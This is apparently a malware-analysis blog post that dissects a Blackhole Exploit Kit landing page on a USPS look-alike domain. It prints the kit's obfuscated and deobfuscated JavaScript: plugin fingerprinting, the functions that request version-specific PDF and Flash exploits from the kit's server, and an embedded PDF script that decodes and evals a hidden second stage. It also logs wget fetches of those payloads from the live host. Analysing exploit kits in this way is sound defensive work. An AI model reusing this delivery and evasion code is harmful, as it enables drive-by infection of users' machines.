BHEK 2.x with Plugin detect 0.7.9
I saw a tweet about a VirusTotal 0/45 detection together with a urlquery.net link, so I got curious:
At first glance this looks like a BHEK (Blackhole Exploit Kit) case to me. This is my first real go at analyzing BHEK, so bear with me...
The URL from urlquery: hxxp://www5-usps.com/nbh/sends/track.php, resolving to 46.166.179.122 (a USPS look-alike domain, so presumably the lure was a fake package-tracking mail)
Virustotal report 0/31
Let's fetch it (with wget, from an isolated analysis box — this is live exploit-kit content):
--2013-02-26 23:53:55-- hxxp://www5-usps.com/nbh/sends/track.php Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 22:58:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.12 Length: unspecified [text/html] Saving to: `track.php' 0K .......... .......... .......... .......... .......... 196K 50K .......... .......... .......... .......... .......... 74.3K 100K ......... 1.09M=0.9s 2013-02-26 23:53:58 (117 KB/s) - `track.php' saved [112216]
This gives us a page with obfuscated JavaScript on it (note: in the pastes below the digit 0 frequently appears as the letter O and 8 as "(" — a copy artifact; the values are decimal character codes, so 112:100:112:100:61 spells "pdpd="):
(Full page at pastebin) language="javascript">var a = "112:1OO:112:1OO:61:123:11(:1O1:114:115:1O5:111:11O:5(:34:4(:46:55:46:57:34:44:11O:97:1O9:1O1:5(:34:112:1OO:112:1OO:34:44:1O4:97:11O:1OO:1O(:1O1:114:5(:1O2:117:11O:99:116:1O5:111:11O:4O:99:44:9(:44:97:41:123:114:1O1:116:117:114:11O:32:1O2:117:11O:99:116:1O5:111:11O:4O:41:123:99:4O:9(:44:97:41:125:125:44:111:112:1O1:11O:(4:97:1O3:5(:34:6O:34:44:1O5:115:6(:1O1:1O2:1O5:11O:1O1:1OO:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:33:61:34:117:11O:1OO:1O1:1O2:1O5:11O:1O1:1OO:34:125:44:1O5:115:65:114:114:97:121:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:47:97:114:114:97:121:47:1O5:41:46:116:1O1:115:116:4O:79:9(:1O6:1O1:99:116:46:112:114:111:116:111:116:121:112:1O1:46:116:111:(3:116:114:1O5:11O:1O3:46:99:97:1O(:1O(:4O:9(:41:41:125:44:1O5:115:7O:117:11O:99:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:1O2:117:11O:99:116:1O5:111:11O:34:125:44:1O5:115:(3:116:114:1O5:11O:1O3:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:125:44:1O5:115:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:11O:117:1O9:9(:1O1:114:34:125:44:1O5:115:(3:116:114:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:3(:3(:4O:47:92:1OO:47:41:46:116:1O1:115:116:4O:9(:41:41:125:44:1O3:1O1:116:7(:117:1O9:(2:1O1:1O3:12O:5(:47:91:92:1OO:93:91:92:1OO:92:46:92:95:44:45:93:42:47:44:115:112:1O(:1O5:116:7(:117:1O9:
:
:
Let's run it through jsbeautifier.org to clean it up:
(Fully beautified page at pastebin; the relevant excerpt follows)
if (window.document)
function c() {
// Decoder: turns the char-code array `a` into the global string `s`, one
// String.fromCharCode call per element. The method name is assembled at
// runtime ("f"+"r"+"o"+"mCh"+"arC"+ff) so "fromCharCode" never appears in
// the page; `ff` ("ode") is only assigned inside a catch block further
// down, so the decoder only works where that exception actually fires.
// `a`, `ff`, `s` and `i` are all globals owned by code outside this excerpt;
// `a` is presumably the ':'-separated list already split into an array by
// code not shown here (indexing the raw string would yield single digits).
for (i = 0, s = ""; i < a.length; i++) {
s += String["f" + "r" + "o" + "mCh" + "arC" + ff](a[i]);
}
}
// Hand-off from decoder to executor: csq passes the decoded string `s` to
// z(), which is defined elsewhere (not in this excerpt). It is only defined
// when window.document exists, i.e. in a browser-like environment.
if (window.document) csq = function () {
z(s);
};
// --- Anti-emulation gate for the decoder. Each try/catch only defines
// something when the expression inside the try throws, which it does in a
// real browser but not under a permissive JavaScript emulator / fake DOM. ---
try {
// In a browser, assigning a number to document.body throws (body must be an
// element); the catch then aliases eval as `e`, assembles the method name
// "replace" (rr) and saves document as `doc`. Where the assignment is
// silently accepted, none of these get defined and the later stages fail.
document.body ^= 2
} catch (q) {
xc = 1;
if (q) e = eval;
rr = "rep" + "la" + "ce";
doc = document;
}
try {
// Second probe supplies "ode", the tail of "fromCharCode" that c() needs.
// It fires either way: if `doc` was never defined (first try did not throw)
// the reference itself throws; if it was, the assignment throws as above.
doc["body"] %= 2
} catch (q) {
ff = "ode";
}
try {
// Assigning to an undeclared global does not throw in sloppy mode, so xc
// normally stays 1. The purpose of this third probe is not clear from the
// listing (possibly filler, possibly a check for a strict-mode host).
gewh = 1;
} catch (sav) {
xc = false;
}
// Escaped "(" -- presumably a regex fragment for the "replace" call built
// above (rr) when the encoded array is cleaned up; that code is not shown.
vvz = "\\(";
var a = "112:100:112:100:61:123:11(:101:114:115:105:111
Decoding this gives us the following — the most interesting parts:
Wepawet link
Hello, PluginDetect 0.7.9 — the kit embeds this plugin-fingerprinting library (here under the name pdpd) to learn which Adobe Reader version is installed and pick an exploit accordingly; the pdfver array used in p1()/p2() below comes from it, and presumably Flash and Java are probed the same way.
pdpd = {
version: "O.7.9",
name: "pdpd",
handler: function(c, b, a) {
return function() {
c(b, a)
}
:
:
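function x(s) {
    // URL-parameter obfuscation used throughout the kit: each character's
    // code is written in base 33 and the pieces are joined with ':'.
    // e.g. x("8fa62") -> "1n:33:2v:1l:1h", exactly what appears in the
    // fetched track.php URLs below. To decode: split on ':', parseInt(part, 33),
    // String.fromCharCode.
    // `0` restored: the pasted listing shows the letter O, a copy artifact
    // (the same O-for-0 swap runs through the whole decoded section).
    // d, i and k are declared locally; the original leaked all three as
    // globals, which nothing visible in the listing relies on.
    var d = [];
    for (var i = 0; i < s.length; i++) {
        var k = (s.charCodeAt(i)).toString(33);
        d.push(k);
    }
    return d.join(":");
}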
:
:
function j1() {
// Always-true stub. Presumably a PluginDetect/kit callback slot for a check
// that is disabled in this configuration; its role is not visible here.
return true;
}
function j2() {
// Always-true stub, same as j1: a switched-off check whose original purpose
// cannot be recovered from this listing.
return true;
}
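function p1() {
    // First PDF exploit request. Appends an <object type="application/pdf">
    // whose data URL points back at the landing page (track.php) with four
    // obfuscated parameters (see x(): base-33 char codes joined by ':'):
    //   wxgnkiyn = x("8fa62")          fixed id, "1n:33:2v:1l:1h" in the fetches
    //   ynis     = x("ymg")            selector ("3m:3a:34"); p2 sends x("j") here
    //   sspcu    = constant token      decodes to "ccf52da862" (session/campaign id?)
    //   pie      = x(pdfver.join(".")) the Reader version PluginDetect found
    // The server keys on that version: the fetches for Reader 7.0 / 8.0 / 8.1
    // below each come back as a PDF of a different Content-Length.
    // Digits restored: the pasted listing shows "3O:3O" (letter O) where the
    // fetched URL has "30:30"; the same O-for-0 swap runs through the listing.
    var d = document.createElement("object");
    d.setAttribute("data", "/nbh/sends/track.php?wxgnkiyn=" + x("8fa62") + "&ynis=" + x("ymg") + "&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=" + x(pdfver.join(".")));
    d.setAttribute("type", "application/pdf");
    document.body.appendChild(d);
}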
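function p2() {
    // Second PDF exploit request, same mechanics as p1() but with a different
    // set of parameter names and selector, so the server can tell the two
    // branches apart:
    //   zaigqae = x("8fa62")          fixed id
    //   xtdgebs = x("j")              selector ("37")
    //   qbthq   = constant token      decodes to "ccf52da862", same as sspcu in p1()
    //   yphqibh = x(pdfver.join("."))  detected Reader version
    // The fetches below show this branch returning smaller PDFs (~10 KB, served
    // with a Content-Disposition filename such as c516a.pdf) than p1()'s ~20 KB.
    // Digits restored: listing shows "3O:3O" (letter O), fetched URL has "30:30".
    var d = document.createElement("object");
    d.setAttribute("data", "/nbh/sends/track.php?zaigqae=" + x("8fa62") + "&xtdgebs=" + x("j") + "&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=" + x(pdfver.join(".")));
    d.setAttribute("type", "application/pdf");
    document.body.appendChild(d);
}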
function p3() {
// Always-false stub: presumably a third PDF branch that is switched off in
// this configuration (p1 and p2 are the live ones).
return false;
}
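function f1() {
    // Flash exploit request. Injects an <object>/<embed> pair for the Shockwave
    // Flash ActiveX control (CLSID D27CDB6E-AE6D-11cf-96B8-444553540000) via
    // innerHTML with allowNetworking='all'; the "movie" is again served by
    // track.php using the same parameter encoding as the PDF requests (see x()):
    //   pbf    = x("8fa62")      fixed id
    //   jsttgj = x("nikbgp")     selector for the Flash branch ("3b:36:38:2w:34:3d")
    //   gbtov  = constant token  decodes to "ccf52da862", same as sspcu/qbthq
    //   info   = long hex blob   meaning not recoverable from this listing
    // Caveat: the fetch of this URL below came back as Content-Type text/html
    // (2671 bytes), not a SWF -- check the saved file's header (FWS/CWS) before
    // treating it as the Flash exploit.
    // Digits restored: the pasted listing shows O for 0 ("3O:3O", "O2e6b...",
    // "...OOOO", "6OO"/"4OO"); the fetched URL confirms "30:30" and "02e6b...".
    var oSpan = document.createElement("span");
    document.body.appendChild(oSpan);
    var url = "/nbh/sends/track.php?pbf=" + x("8fa62") + "&jsttgj=" + x("nikbgp") + "&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc";
    oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='" + url + "' /><embed src='" + url + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}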
function ff2() {
// Always-false stub: presumably a second Flash branch, switched off here
// (f1 is the live one).
return false;
}
:
:
We now have the functions that build the requests for the PDFs and the Flash file.
Little obfuscation is left: x() is just each character code written in base 33 and joined with ':' (x("8fa62") → 1n:33:2v:1l:1h; the recurring token 30:30:33:1k:1h:31:2v:1n:1l:1h decodes to ccf52da862, probably a session or campaign id), and pdfver is the Reader version PluginDetect reported. Running x() on the literal strings and trying a few Reader versions gives the full URLs needed to fetch the exploit files — and, as the fetches show, the server hands out a different PDF (different Content-Length) per version. Let's fetch them:
Adobe 8.0 (full version string 8.0.0.456) as input to p2() — note the parameter names zaigqae/xtdgebs/qbthq/yphqibh are p2()'s, not p1()'s:
Virustotal report 21/46
--2013-02-27 00:01:47-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:06:04 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Accept-Ranges: bytes Content-Length: 9874 Content-Disposition: inline; filename=c516a.pdf Length: 9874 (9.6K) [application/pdf] Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' 0K ......... 100% 114K=0.08s 2013-02-27 00:01:52 (114 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' saved [9874/9874]
Adobe 8.0 as input to p1():
--2013-02-27 00:14:32-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:18:49 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Content-Length: 20065 ETag: "c6c16a19dfb3210cd8d680eef3a24429" Last-Modified: Tue, 26 Feb 2013 23:17:43 GMT Accept-Ranges: bytes Length: 20065 (20K) [application/pdf] Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' 0K .......... ......... 100% 91.2K=0.2s 2013-02-27 00:14:37 (91.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' saved [20065/20065]
Adobe 8.1 as input to p1():
--2013-02-27 00:15:39-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:19:59 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Content-Length: 20053 ETag: "e03b272d4c3f1b6dd29e5ae5c4e69c28" Last-Modified: Tue, 26 Feb 2013 23:18:52 GMT Accept-Ranges: bytes Length: 20053 (20K) [application/pdf] Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' 0K .......... ......... 100% 117K=0.2s 2013-02-27 00:15:47 (117 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' saved [20053/20053]
Adobe 7.0 as input to p1():
--2013-02-27 00:19:33-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:23:49 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Content-Length: 20041 ETag: "dca06b8cac6d323ef4819ebb35713352" Last-Modified: Tue, 26 Feb 2013 23:22:43 GMT Accept-Ranges: bytes Length: 20041 (20K) [application/pdf] Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' 0K .......... ......... 100% 88.2K=0.2s 2013-02-27 00:19:37 (88.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' saved [20041/20041]
Adobe 8.0 as input to p2():
Virustotal report 21/46
--2013-02-27 00:23:46-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:27:59 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Accept-Ranges: bytes Content-Length: 10838 Content-Disposition: inline; filename=6ed41.pdf Length: 10838 (11K) [application/pdf] Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' 0K .......... 100% 83.6K=0.1s 2013-02-27 00:23:47 (83.6 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' saved [10838/10838]
Adobe 9.0 as input to p2():
Virustotal report 21/46
--2013-02-27 00:26:30-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:30:53 GMT Content-Type: application/pdf Connection: keep-alive X-Powered-By: PHP/5.4.12 Accept-Ranges: bytes Content-Length: 10815 Content-Disposition: inline; filename=7453e.pdf Length: 10815 (11K) [application/pdf] Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' 0K .......... 100% 123K=0.09s 2013-02-27 00:26:41 (123 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' saved [10815/10815]
Flash, f1() — note that the response below is Content-Type: text/html and only 2671 bytes, not application/x-shockwave-flash, so what was saved may be an HTML wrapper or decoy rather than the SWF itself; check the file's magic bytes (FWS/CWS) before reading much into the 10/46 verdict:
Virustotal report 10/46
--2013-02-27 00:31:24-- hxxp://www5-usps.com/nbh/sends/track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc Resolving www5-usps.com... 46.166.179.122 Connecting to www5-usps.com|46.166.179.122|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Tue, 26 Feb 2013 23:35:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.12 Length: unspecified [text/html] Saving to: `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' 0K .. 121M=0s 2013-02-27 00:31:32 (121 MB/s) - `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' saved [2671]
Happy to get the files :) but no time to analyze them further at the time :(
Update 2013-02-28
I found time to look further into this case, so let's start with the PDFs:
Let's see whether the files hide anything worth a closer look. Object statistics for c516a.pdf (the output below looks like pdf-parser's statistics mode):
c516a.pdf:
statistics:
Comment: 4 XREF: 1 Trailer: 0 StartXref: 0 Indirect object: 26 11: 52, 6, 18, 19, 20, 21, 22, 28, 31, 32, 48 /Annot 1: 15 /Catalog 1: 1 /EmbeddedFile 6: 41, 42, 99999, 44, 45, 46 /Font 3: 14, 27, 29 /FontDescriptor 1: 30 /Page 1: 8 /Pages 1: 2 /Pattern 1: 13
Object 99999 stands out: an /EmbeddedFile with an implausibly high object number, in a file that also has no trailer and no startxref (Trailer: 0, StartXref: 0) — both typical of hand-crafted malicious PDFs. Let's dump it:
obj 99999 0
Type: /EmbeddedFile
Referencing:
Contains stream
<</Length
1313 / Filter / FlateDecode / Type / EmbeddedFile >>
<< /Length 1313
/Filter / FlateDecode / Type / EmbeddedFile >>
< template > < subform name = "form1"
layout = "tb"
locale = "ru_RU" > < pageSet > < pageArea > < contentArea h = "10.5in"
w = "8in"
x = "0.25in"
y = "0.25in" > < /contentArea><medium long="11in" short="8.5in" stock="letter"></medium > < /pageArea></pageSet > < subform h = "10.5in"
w = "8in" > < field h = "98.425mm"
name = "ImageField1"
w = "28.575mm"
x = "95.25mm"
y = "19.05mm" > < ui > < imageEdit > < /imageEdit></ui > < event activity = "initialize"
xmlns: xfa = "http://testset.com" > < xfa: script contentType = 'application/x-javascript' > p = parseIn & #116;;
a= & quot;
53 * * ^ !@# * * 48 * * 4P * * 1L * * 4N * * ^ !@# * * 48 * * 4B * * 4B * * 4G * * ^ !@# * * 4L * * 4E * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 49 * * ^ !@# * * 49 * * 49 * * 27 * * 1L * * ^ !@# * * 4A * * 4A * * 4A * * 27 * * ^ !@# * * 1L * * 4B * * 4B * * 4B * * ^ !@# * * 27 * * 1L * * 4C * * 4C * * ^ !@# * * 4C * * 27 * * 1L * * 4D * * ^ !@# * * 4D * * 4D * * 27 * * 1L * * ^ !@# * * 4E * * 4E * * 4E * * 27 * * ^ !@# * * 1L * * 4F * * 4F * * 4F * * ^ !@# * * 2M * * 53 * * 48 * * 4P * * ^ !@# * * 1L * * 4N * * 4M * * 4G * * ^ !@# * * 4L * * 51 * * 4C * * 4P * * ^ !@# * * 50 * * 46 * * 48 * * 27 * * ^ !@# * * 1L * * 4G * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 55 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 56 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 46 * * ^ !@# * * 4J * * 2C * * 2O * * 1N * * ^ !@# * * 2F * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2G * * 2C * * 2I * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 4D * * 2H * * 2E * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 48 * * 2E * * 4C * * 49 * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 2B * * 2D * * 2B * * ^ !@# * * 2J * * 2D * * 2F * * 48 * * ^ !@# * * 2H * * 4C * * 2D * * 4D * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2D * * 2H * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 
2B * * 2B * * 2B * * ^ !@# * * 2C * * 2D * * 2E * * 2K * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2H * * 2F * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2B * * 2B * * 2F * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 1N * * 26 * * 1N * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 4D * * ^ !@# * * 2H * * 49 * * 2H * * 4B * * ^ !@# * * 2H * * 2K * * 2I * * 2C * * ^ !@# * * 2H * * 4B * * 2E * * 2G * * ^ !@# * * 2I * * 2K * * 2I * * 2B * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2I * * 2C * * 2I * * 2D * * ^ !@# * * 2I * * 2H * * 2H * * 2C * * ^ !@# * * 2H * * 48 * * 2H * * 4B * * ^ !@# * * 2E * * 2H * * 2I * * 2F * * ^ !@# * * 2H * * 2F * * 2H * * 4C * * ^ !@# * * 2H * * 4D * * 2H * * 2H * * ^ !@# * * 2D * * 2K * * 2H * * 2C * * ^ !@# * * 2E * * 4B * * 2E * * 2C * * ^ !@# * * 2I * * 2E * * 2I * * 2E * * ^ !@# * * 2H * * 4C * * 2H * * 2J * * ^ !@# * * 2H * * 2D * * 2H * * 2H * * ^ !@# * * 2D * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4C * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2H * * ^ !@# * * 2I * * 2D * * 2E * * 48 * * ^ !@# * * 2E * * 2C * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2J * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 49 * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2E * * ^ !@# * * 2E * * 2E * * 2E * * 48 * * ^ !@# * * 2E * * 2B * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2B * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 2F * * 2I * * 2B * * ^ !@# * * 2I * * 2I * * 2H * * 48 * * ^ !@# * * 2H * * 2E * * 2I * * 2F * * ^ !@# * * 2I * * 2B * * 2I * * 2J * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4A * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ 
!@# * * 2E * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2D * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 4B * * 2H * * 2E * * ^ !@# * * 2H * * 48 * * 2I * * 4D * * ^ !@# * * 2E * * 2B * * 2I * * 2J * * ^ !@# * * 2H * * 2B * * 2I * * 4C * * ^
:
:
// --- Decoder for the second stage. Identifiers such as parseInt, length,
// substr, fromCharCode and k are spelled with numeric character references
// (#116 is 't', #108 'l', #115 's', #102 'f', #107 'k') so the names never
// appear in clear text; the space after each ampersand is an extraction artifact. ---
// Strip the two separator patterns, "^!@#" and "**", from the encoded blob.
a = a.replace.apply(a, [/\^!@#/g, & quot; & quot;]);
a = a.replace.apply(a, [/\*\*/g, & quot; & quot;]);
s = [];
// Every two characters form a base-26 number; minus 15 gives a char code.
for (i = 0; i & lt; a. & #108;ength;i+= 2) {
s.push(p(a. & #115;ubstr(i,2),26)-15);
}
// ss = String.fromCharCode
ss= String. & #102;romCharCode;
// Environment check before anything runs: the document must carry no Authors
// metadata (the "= ==" is an extraction artifact, presumably "==") and must
// be larger than 9000 bytes -- "(16000, 9000)" is the comma operator, so only
// 9000 counts; all three PDFs (9874-10838 bytes) pass 9000 and none would
// pass 16000. Presumably meant to stop the stage running once the script has
// been pulled out of the PDF or the file has been altered.
if(event.target.info.Authors= == null) if (event.target.filesize & gt;
(16000, 9000)) {
// k = decoded second stage; q = "e" + "va" (0x76 'v', 0x61 'a'), so
// event.target[q + "l"] is the document object's eval, invoked on the
// decoded code (k, written as #107).
k = ss.apply(String, s);
q = "e" + ss.apply(String, [0x76, 0x61]);
event.target[q + "l"]( & #107;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>
